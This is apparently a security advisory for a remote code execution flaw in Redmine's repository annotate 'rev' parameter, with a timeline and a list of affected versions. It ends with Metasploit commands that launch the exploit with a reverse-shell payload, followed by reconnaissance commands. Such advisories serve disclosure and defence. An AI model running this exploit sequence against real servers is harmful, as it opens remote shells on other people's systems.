Timeline :

Vulnerability submitted by joernchen to Redmine the 2010-12-18
Vulnerability advisory and new package provided by Redmine the 2010-12-23
Metasploit exploit released the 2010-12-24

    PoC provided by :

joernchen

    Reference(s) :

OSVDB-70090

    Affected version(s) :

All versions of Redmine previous version 1.0.5, version 0.9.x included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

    Tested on Ubuntu Lucid 10.04.1 LTS with :

    CVS as SCM

    Description :

joernchen has report a vulnerability, how could be classified as highly critical, for the project management web application Redmine, how could allow an attacker to compromise a vulnerable system.

The entries submitted to the “rev” parameter, from the “repository/annotate” script of a Redmine project, are not treated correctly before to be used. This error could be used to execute, remotely, arbitrary code on the vulnerable server.

The vulnerability affect principally the bazaar, cvs, darcs and mercurial SCM adapters. The code will be executed with the privileges of the user running the  project management web application Redmine (for example www-data).

The vulnerability has been confirmed for all versions previous version 1.0.5. The supplier propose an update to correct this vulnerability.

    Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig